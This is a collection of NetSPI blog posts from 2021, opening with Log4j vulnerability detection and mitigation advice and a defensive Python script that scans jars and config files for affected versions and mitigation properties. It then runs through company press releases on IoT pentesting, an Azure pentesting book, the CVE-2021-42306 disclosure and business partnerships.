The first step to threat mitigation is to understand Log4j’s presence in your organization. To answer the question “Which of my applications use Log4j?” NetSPI recommends:

  • Searching code repositories for the following properties and setting them to the correct parameter value based on the CVE remediation recommendation:
    • "log4j2.formatMsgNoLookups"
    • "com.sun.jndi.rmi.object.trustURLCodebase"
    • "com.sun.jndi.cosnaming.object.trustURLCodebase"
  • Checking your asset management database to see whether you are running Apache Log4j2 versions ranging from 2.0 to 2.16 in your environment. If so, you are likely vulnerable and require an update, though there are some exceptions.
  • Checking for affected versions of log4j jar files on file systems to prioritize systems that require further analysis.
  • If a software composition analysis (SCA) tool is being used, asking the tool's vendor to develop a check for the vulnerability, or creating a custom check for the incorrect setting.

For additional detection tips, download our tip sheet, 5 Strategies for Log4j Vulnerability Identification.
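As an added example of the first three checks above (my code, not a NetSPI tool), the following Python script walks a directory tree, reads the log4j-core version from the jar's Maven pom.properties (and looks one level into WARs and EARs for bundled jars, reporting "unknown" when only the JndiLookup class is present), classifies the version against the 2.0 to 2.16 range the post gives, and reports whether the three properties listed above are set to the expected value. Two things are assumptions rather than content of this post: the expected values (formatMsgNoLookups=true, the two trustURLCodebase properties=false) come from the Apache and JDK remediation guidance, and the sample tree it scans is constructed in a temporary directory with placeholder bytes.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Affected range exactly as the post states it: Log4j 2 from 2.0 through 2.16.
AFFECTED_MIN, AFFECTED_MAX = (2, 0), (2, 16)
# The three properties the post says to search for, mapped to the value the
# remediation guidance expects (assumption: values from the Apache/JDK advisories, not this post).
EXPECTED_PROPERTY_VALUES = {
    "log4j2.formatMsgNoLookups": "true",
    "com.sun.jndi.rmi.object.trustURLCodebase": "false",
    "com.sun.jndi.cosnaming.object.trustURLCodebase": "false",
}
# Standard Maven metadata path inside log4j-core jars, and the class that implements the JNDI lookup.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}
TEXT_SUFFIXES = {".properties", ".xml", ".yml", ".yaml", ".conf", ".sh", ".txt"}


def parse_version(text):
    # '2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0): numeric prefix of each dotted part
    nums = []
    for part in text.split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    return tuple(nums)


def is_affected(version):
    v = parse_version(version)
    return len(v) >= 2 and AFFECTED_MIN <= v[:2] <= AFFECTED_MAX


def _log4j_core_version(zf):
    # version from pom.properties; 'unknown' if only JndiLookup.class is present; None otherwise
    names = set(zf.namelist())
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return "unknown" if JNDI_LOOKUP_CLASS in names else None


def archive_findings(path):
    # (location, version) for log4j-core in an archive and in jars nested one level down (WAR/EAR)
    out = []
    try:
        with zipfile.ZipFile(path) as zf:
            ver = _log4j_core_version(zf)
            if ver is not None:
                out.append((str(path), ver))
            for member in zf.namelist():
                if member.lower().endswith(".jar"):
                    with zipfile.ZipFile(io.BytesIO(zf.read(member))) as inner:
                        iver = _log4j_core_version(inner)
                        if iver is not None:
                            out.append((f"{path}!{member}", iver))
    except zipfile.BadZipFile:
        pass
    return out


def scan_tree(root):
    # Walk a tree; flag affected archives and mitigation properties set to the wrong value
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.suffix.lower() in ARCHIVE_SUFFIXES:
            for where, ver in archive_findings(p):
                findings.append({"kind": "archive", "where": where, "detail": ver,
                                 "action_needed": ver == "unknown" or is_affected(ver)})
        elif p.suffix.lower() in TEXT_SUFFIXES:
            text = p.read_text("utf-8", errors="replace")
            for name, expected in EXPECTED_PROPERTY_VALUES.items():
                for m in re.finditer(re.escape(name) + r"\s*[=:]\s*([^\s,\"']+)", text):
                    findings.append({"kind": "property", "where": str(p),
                                     "detail": f"{name}={m.group(1).lower()}",
                                     "action_needed": m.group(1).lower() != expected})
    return findings


def demo():
    # Constructed sample tree in a temp dir (placeholder bytes, not real Log4j artifacts)
    app = Path(tempfile.mkdtemp(prefix="log4j-scan-")) / "app"
    (app / "lib").mkdir(parents=True)
    with zipfile.ZipFile(app / "lib" / "log4j-core-2.14.1.jar", "w") as zf:
        zf.writestr(POM_PROPERTIES, "version=2.14.1\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    inner = io.BytesIO()  # a WAR bundling an unversioned copy of the lookup class
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(app / "site.war", "w") as zf:
        zf.writestr("WEB-INF/lib/logging.jar", inner.getvalue())
    (app / "run.sh").write_text("java -Dlog4j2.formatMsgNoLookups=false "
                                "-Dcom.sun.jndi.rmi.object.trustURLCodebase=false -jar app.jar\n")
    return scan_tree(app)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

Treat a property hit as a prioritization signal, not as proof of remediation: as the post notes, the 2.15.0 fix itself was found to be incomplete, so the reliable action remains upgrading to the version Apache recommends. Archives nested more than one level deep, and jars whose metadata has been stripped by shading, are not fully resolved by this script; the "unknown" result exists so those still get flagged for manual review.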

What can I do to protect my organization?

Review the Apache Log4j security vulnerability announcement and update to the appropriate version of Log4j 2. It is important to follow the mitigation steps outlined by Apache and continuously check in for additional vulnerable instances.

NetSPI also recommends organizations ensure their detection tools (Qualys, Nessus, Nexpose, etc.) produce checks for the vulnerability as this is likely to have lasting impacts.

If you have questions about the Log4j vulnerabilities or would like NetSPI to perform a targeted test for the vulnerability in your environment, please visit https://www.netspi.com/security-testing/apache-log4j-assessment.

Post: Log4j: Is My Organization Impacted?
Permalink: https://www.netspi.com/?p=26924
Excerpt: Find out if your organization is vulnerable to the Log4j vulnerabilities, read about the impact of CVE-2021-44228 and its variants, and learn mitigation steps to take.

Next post (published 2021-12-10):

On December 10, 2021, NetSPI was featured in an article written by Help Net Security. Read the full article below or online here.

+++

NetSPI launched its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities.

NetSPI IoT penetration testing

With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.

NetSPI’s new IoT testing services encompass the following capabilities:

  • ATM penetration testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture.
  • Automotive penetration testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development.
  • Medical device penetration testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines.
  • Operational technology (OT) architecture and security review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation.
  • Embedded penetration testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device.

“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems,” said Aaron Shilts, President and CEO at NetSPI. “Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide.”

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.

“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”

Post: Help Net Security: NetSPI offers protection against cybersecurity threats with IoT penetration testing services
Permalink: https://www.netspi.com/?p=26938
Excerpt: On December 10, 2021, NetSPI was featured in an article written by Help Net Security.

Next post (published 2021-12-08):

On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com. Read the full article below or online here.

+++

NetSPI announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.

NetSPI's new IoT testing services encompass the following capabilities: 

  • ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. 
    Learn more about ATM pentesting.
  • Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems - at any stage of automotive development. 
    Learn more about automotive pentesting.
  • Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. 
    Learn more about medical device pentesting.
  • Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. 
    Learn more about OT architecture and security review.
  • Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. 
    Learn more about embedded pentesting.

"IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI's IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice. 

"IoT pentesting has become an important part of security strategy and business processes - especially given the increased connectedness in both personal and professional lives," said Trowell. "There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI's new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers."

Post: VMBlog.com: NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
Permalink: https://www.netspi.com/?p=26936
Excerpt: On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com.

Next post (published 2021-12-08):

Led by IoT security expert Larry Trowell, the IoT pentesting services focus on securing ATMs, automotive, medical devices, operational technology, and other embedded systems.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks. 

NetSPI’s new IoT testing services encompass the following capabilities:  

  • ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
  • Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development. Learn more about automotive pentesting.
  • Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
  • Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
  • Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting.

“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide." 

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.  

“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.” 

To learn more about NetSPI’s IoT security capabilities, visit the NetSPI website.  

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510

Post: NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
Permalink: https://www.netspi.com/?p=26848
Excerpt: Learn about NetSPI’s IoT security services, including ATM, automotive, medical devices, operational technology (OT), and embedded system penetration testing services.

Next post (published 2021-11-30):

Co-authored by two of the world’s foremost experts on Azure cybersecurity, the book explores how to perform successful pentesting and risk assessment of Microsoft Azure environments.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of Penetration Testing Azure for Ethical Hackers, a book co-authored by NetSPI practice director Karl Fosaaen and global cloud security consultant David Okeyode. Written to provide security professionals hands-on lessons and tips for successful Azure penetration testing, the book serves as a resource for industry professionals to simulate real-world Azure attacks and learn how to better identify vulnerabilities.

To keep sensitive data secure as businesses migrate from on-premise environments to the cloud, pentesting has become a necessity for all organizations operating in Microsoft Azure. This investment ensures that organizations have consistent visibility into security gaps in cloud infrastructures, and provides actionable guidance to remediate vulnerabilities and improve organizations’ overall cloud security posture. 

“The cloud is top of mind for nearly all of today’s security professionals and will continue to be a vital aspect to IT spend,” said author Karl Fosaaen, practice director at NetSPI. “This book provides a digestible framework for professionals of all levels to better understand pentesting within Azure environments. It offers hands-on exercises for readers to test their skills and learn key pentesting techniques that are crucial to successfully assess Azure environments in today’s ecosystem.”  

Penetration Testing Azure for Ethical Hackers takes readers through the prerequisites for Azure penetration testing, while also giving step-by-step instructions on how to set up a pentesting lab. Readers will also learn how to simulate an attack on Azure assets, demonstrating the techniques and methodologies an attacker uses to gain persistent access to cloud environments.

“With the rapid acceleration to cloud-based environments and increased gaps in Azure security implementations, penetration testing is becoming an increasingly important skill for security professionals to utilize,” said David Okeyode, co-author and EMEA chief technology officer, Azure Cloud at Palo Alto Networks. “IT teams will come to understand how hackers attack resources hosted within Azure, learn how to effectively protect their environments from these threats, and extend their current pentesting skill sets and capabilities.” 

Order Penetration Testing Azure for Ethical Hackers now on Amazon. To learn more about NetSPI’s Azure cloud penetration testing capabilities, visit the NetSPI website.

To see Azure penetration testing techniques in action, read our technical blog detailing Karl’s latest Microsoft Azure cloud vulnerability finding: CVE-2021-42306.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510

(Post title: NetSPI Practice Director Publishes Azure Penetration Testing Book for Ethical Hackers; https://www.netspi.com/?p=26751)

Published 2021-11-18

On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek. Read the full article below or online here.

Microsoft on Wednesday informed customers about a recently patched information disclosure vulnerability affecting Azure Active Directory (AD).

Tracked as CVE-2021-42306 (CVSS score of 8.1), the vulnerability exists because of the manner in which Automation Account “Run as” credentials are created when a new Automation Account is set up in Azure.

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and could be accessed by anyone with access to information on App Registrations. An attacker could use these credentials to authenticate as the App Registration.

Security researchers with enterprise penetration testing firm NetSPI, who identified the vulnerability, explain that an attacker could leverage the bug to escalate privileges to Contributor of any subscription that has an Automation Account, and access resources in the affected subscriptions.

“This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline,” the researchers explain.

According to Microsoft, the vulnerability is related to the keyCredentials property, which was designed for configuring authentication credentials for applications, and which accepts a certificate containing public key data for authentication, but which also incorrectly stored such certificates.

“Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data,” Microsoft says.

The tech giant says it has addressed the bug by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been incorrectly stored in clear text.

“As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property,” the company says.

Microsoft also notes that all Automation Run As accounts that have been created using Azure Automation self-signed certificates between October 15, 2020, and October 15, 2021, are affected by the issue. Azure Migrate services and customers who deployed the preview version of VMware to Azure DR experience with Azure Site Recovery (ASR) might also be affected.

Thus, Azure AD customers should cycle through all Automation Account “Run as” certificates to make sure no credentials are exposed.

(Post title: SecurityWeek: Microsoft Informs Users of High-Severity Vulnerability in Azure AD; https://www.netspi.com/?p=26705)

Published 2021-11-17
The vulnerability, found by NetSPI’s cloud pentesting practice director Karl Fosaaen, affects most organizations that use Azure.

Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today recognizes the work of practice director Karl Fosaaen, who discovered and reported a critical misconfiguration in Microsoft Azure. If exploited by an adversary, CVE-2021-42306: CredManifest would allow bad actors to escalate up to a Contributor role in the Azure Active Directory subscription. If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription.

Because Azure Active Directory enables employees to sign in and access resources, if the issue was not identified by NetSPI and a malicious individual found the vulnerability first, they would have the potential to access all of the resources in the affected subscriptions. This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline. This would leave organizations without access to external resources that are hosted in the vulnerable subscription, including applications hosted by App services, public files from Storage Accounts, or databases hosted in AzureSQL.

“The scope of this issue is wide-sweeping, given the prominence of “Run as” accounts in Azure and the growing adoption of Azure. We’re proud to have identified and fixed it before the bad guys,” said Fosaaen. “The discovery of this vulnerability highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test.” 

Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure blog post online here.

“We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe,” said a representative from MSRC. Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal. 

Although Microsoft has updated the impacted Azure services, NetSPI recommends cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised. 

A technical explanation of the vulnerability, how it was found, its impact, and remediation steps, can be found on the NetSPI technical blog. To connect with NetSPI for Azure cloud penetration services, visit NetSPI.com.

Media Contact:
Amanda Echavarri, Inkhouse for NetSPI
netspi@inkhouse.com
(978) 201-2510 

(Post title: NetSPI Uncovers a Critical Azure Vulnerability, CVE-2021-42306: CredManifest; https://www.netspi.com/?p=26697)

Published 2021-10-27

Dubai, UAE and Minneapolis, Minnesota – SecureLink, the Trusted Risk Advisor and a subsidiary of StarLink, signed a distribution agreement with NetSPI, a leader in Enterprise Security Testing and Attack Surface Management, for the MEA region.

Pioneers in penetration testing, NetSPI is changing the pentesting scenario to make it easier for enterprises to track trends and improve their vulnerability management program. The Technical Assessments include Web Application Penetration Testing, Mobile Application Penetration Testing, Source Code Review, Infrastructure Vulnerability Assessment, Red Teaming, and Breach and Attack Simulation.

Through this partnership, NetSPI can capitalize on SecureLink’s consultancy, sales, and marketing expertise; use SecureLink’s direct connections with decision-makers in its extensive customer base to create and convert opportunities for NetSPI’s cybersecurity testing services; and take advantage of the years of trust SecureLink has built in the region.

Manish Pardeshi, Director, SecureLink, commented: “We are privileged to onboard NetSPI in our ecosystem, which can offer our customers a more continuous and scalable assessment of their environment with NetSPI’s Penetration Testing as a Service (PTaaS) and ensure real-time visibility and full control over the testing program.”

"We are proud to announce our partnership with SecureLink, the well-established cybersecurity leader in the MEA region. Together we will transform the cybersecurity testing industry with NetSPI’s technology-enabled services and expertise," said Aaron Shilts, President and CEO at NetSPI. "In partnership with SecureLink, multinational enterprises in MEA now have access to NetSPI’s penetration testing and adversary simulation services to test their applications, networks, and cloud at scale and better manage their expanding attack surface. The sophistication, methodology, and value provided by SecureLink and NetSPI is unmatched."

About SecureLink

SecureLink is a risk advisory firm headquartered in Dubai, UAE, and part of the StarLink Group of companies, which has a turnover of USD 500 Million, over 375 employees and a presence in 20 countries in the META region, including the UK and USA. SecureLink is an independent advisory firm assisting customers in identifying, mitigating, and managing their business risks. SecureLink provides comprehensive assessment of risks across People, Process & Technology and helps with the right governance frameworks to ensure that risks are continuously monitored and acted upon. SecureLink offers these services via its partner community to develop frameworks and implement platforms for automation of governance, risk, and compliance requirements. For more information about SecureLink, please visit www.securelinkme.net.

SecureLink Press Contact:
Raji Joy John
Marketing Director, StarLink
raji@starlinkme.net
+971 4 2794000

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

(Post title: SecureLink and NetSPI partner to enable enterprises to manage their attack surface with tech-enabled penetration testing services; https://www.netspi.com/?p=26594)

Published 2021-09-14

Tel Aviv and Minneapolis, Minnesota  –  Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.

Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).

To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of performing pentests on a set schedule, they should be performed continuously as high risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities. 

“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen, context-aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster,” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities, and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”

“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”

About Apiiro

Apiiro is the industry's first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers' knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com

Apiiro Media Contact:
Kelly Hall
Offleash PR for Apiiro
apiiro@offleashpr.com

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

(Post title: Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing; https://www.netspi.com/?p=26390)

Published 2021-08-18
As CTO, Travis will drive penetration testing, adversary simulation, and attack surface management product strategy to support clients and services teams.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Travis Hoyt as its new Chief Technology Officer (CTO). In his new role, Travis is responsible for enhancing and expanding NetSPI’s technology-enabled services portfolio.

Travis brings over 20 years of cybersecurity leadership experience to NetSPI, previously leading security programs for major financial institutions, including Bank of America and TIAA, where he focused on application security and technology-enabled control transformation. Embracing innovation, he has built and patented two technologies from scratch – a vulnerability assessment and management platform and a posture management solution – well before the market.

“The client perspective and spirit of innovation Travis adds to our team is invaluable to our business and the success of our clients,” said Aaron Shilts, President and CEO at NetSPI. “Travis has a track record of bringing the vision, design, and execution of technologies to life. With his leadership, we are eager to continue disrupting the historically-stagnant pentesting and vulnerability management space.”

“The quality of the NetSPI team and their reputation for innovation is unmatched in the penetration testing industry,” said Travis. “As CTO I’m excited to provide immediate input into the product roadmap and help the team recognize what we need to do to provide the most value to our clients. Looking to the future, I’m eager to start exploring the next generation architecture that will drive the industry forward.”

Connect with Travis Hoyt on LinkedIn, or learn more about NetSPI’s penetration testing services.

Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

(Post title: Financial Services Security Veteran Travis Hoyt Joins NetSPI as CTO; https://www.netspi.com/?p=26216)

Published 2021-08-10
As a part of a risk-based vulnerability management program, organizations can leverage NetSPI’s risk scoring for industry benchmarking, prioritization of security activities, and more.

Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the addition of risk scoring to its Resolve™ penetration testing and vulnerability management platform. In conjunction with Penetration Testing as a Service (PTaaS), NetSPI’s risk scoring intelligence helps its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business.

NetSPI’s new risk scoring capabilities dynamically integrate into PTaaS to provide both a granular vulnerability risk score as well as an aggregate risk score for an organization and its projects, assets, applications, and networks. Risk scoring is only available to NetSPI clients that leverage its penetration testing services.

The risk scores serve as a quantitative metric for risk reduction over time, cybersecurity spend validation, resource allocation, and industry benchmarking. NetSPI’s risk score enables organizations to incorporate business context and the respective threat landscape to accurately prioritize remediation of vulnerabilities.

“There are varying approaches to assigning vulnerability severity, but risk today extends far beyond individual vulnerabilities,” said Jake Reynolds, Head of Product at NetSPI. “The key is to recognize the risks most likely to disrupt the business, identify the threats that would increase those risks, and prioritize the most appropriate mitigations to protect your organization from those threats. NetSPI’s risk scoring does just that.”

According to Gartner[i], organizations with a risk-based vulnerability management program are expected to experience 80% fewer breaches. Download this whitepaper to learn how to use risk scoring to propel your risk-based vulnerability management program forward – and for a detailed overview of NetSPI’s risk score methodology.

Download How to Use Risk Scoring to Propel Your Risk-Based Vulnerability Management Program Forward.

“Reactive cybersecurity is a thing of the past. Security leaders must get proactive and take a risk-based approach to stay ahead of today’s adversaries,” said NetSPI President and CEO Aaron Shilts. “Our risk scores enable NetSPI clients to make proactive security decisions based on their unique risk factors. In other words, it allows them to confidently allocate budget and resources to the vulnerabilities that matter most.”

Learn more about PTaaS online here or contact us for a demo of NetSPI’s penetration testing and vulnerability management platform, Resolve™.

[i] Gartner, 2019 – Forecast Analysis: Risk-Based Vulnerability Management, Worldwide (Gardner, Dale)

Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

(Post title: NetSPI Adds Risk Scoring to its Penetration Testing and Vulnerability Management Platform; https://www.netspi.com/?p=26114)

Published 2021-08-05

On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category:

After honoring 50 companies as Inno on Fire honorees, Minne Inno — the Business Journal’s news outlet focused on the startup scene — presents this year’s Blazer Award winners. The Blazer winners were selected from the 50 Fire honorees by a panel of judges who chose one company from each category that is lighting its industry on fire.

High Tech Company

NetSPI

NetSPI doubled down on talent and grew its team over the past year.

Earlier this summer, the Minneapolis-based cybersecurity firm added a ransomware attack simulation, in addition to its portfolio of penetration testing services.

“It was a good time for us, because we were already in the middle of disrupting an already stale industry,” Shilts said. “We moved fast, we over communicated, but more than anything, we just focused on taking care of our customers.”

Moving forward, NetSPI has plans to keep disrupting the industry without compromising quality.

“Cyber is still fast moving and very innovative, but when you’re really a disruptor and changing the way people consume a service, that gets everybody excited,” Shilts said.

To learn more, read the full article here:
https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/08/05/blazer-awards.html

